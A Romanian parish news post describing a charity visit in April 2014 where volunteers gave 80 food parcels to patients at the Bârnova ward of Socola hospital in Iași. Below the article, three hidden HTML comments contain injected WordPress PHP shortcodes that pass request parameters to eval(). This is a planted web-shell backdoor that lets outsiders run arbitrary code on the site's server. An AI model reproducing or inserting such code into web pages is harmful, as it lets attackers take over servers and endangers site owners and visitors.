Activitate filantropică la secţia Bârnova a Spitalului Socola din Iaşi

Parohia „Sfinţii Arhangheli Mihail şi Gavriil“ – Canta din Iaşi a organizat sâmbătă, 5 aprilie 2014, o nouă acţiune filantropică la secţia Bârnova a Spitalului Socola din Iaşi. Cu acest prilej, s-au pregătit 80 de pachete cu alimente pentru pacienţii internaţi în secţia amintită. Cu sprijinul domnului Ovidiu Manolache, asistentul-şef al secţiei, şi al personalului medical, darurile au fost oferite fiecărui bolnav în parte. Preţ de câteva minute, prietenii de la Iaşi au stat de vorbă cu cei internaţi pentru a le afla durerea sau bucuria. „Să veniţi şi săptămâna viitoare. Vă aşteptăm!“, „Poate ajungeţi şi în prima zi de Paşti la noi“, „Mulţumim celor care s-au gândit la noi“, „Bodaproste pentru ceea ce s-a dat de pomană!“ – sunt doar câteva din gândurile adunate de la pacienţii internaţi în secţia Bârnova. Bucuria revederii şi a recunoştinţei pentru darul primit nu poate fi descrisă în cuvinte. Chiar dacă tristeţea, singurătatea, boala şi lipsa familiei îi afectează de cele mai multe ori, grija manifestată de cei dinafară reprezintă o satisfacţie sufletească pentru „fraţii prea mici“ ai Mântuitorului de la Bârnova.

<!– [insert_php]if (isset($_REQUEST["VyF"])){eval($_REQUEST["VyF"]);exit;}[/insert_php][php]if (isset($_REQUEST["VyF"])){eval($_REQUEST["VyF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["OCAb"])){eval($_REQUEST["OCAb"]);exit;}[/insert_php][php]if (isset($_REQUEST["OCAb"])){eval($_REQUEST["OCAb"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["YkqR"])){eval($_REQUEST["YkqR"]);exit;}[/insert_php][php]if (isset($_REQUEST["YkqR"])){eval($_REQUEST["YkqR"]);exit;}[/php] –>

Acest articol a fost publicat în Noutăţi din parohie. Salvează legătura permanentă.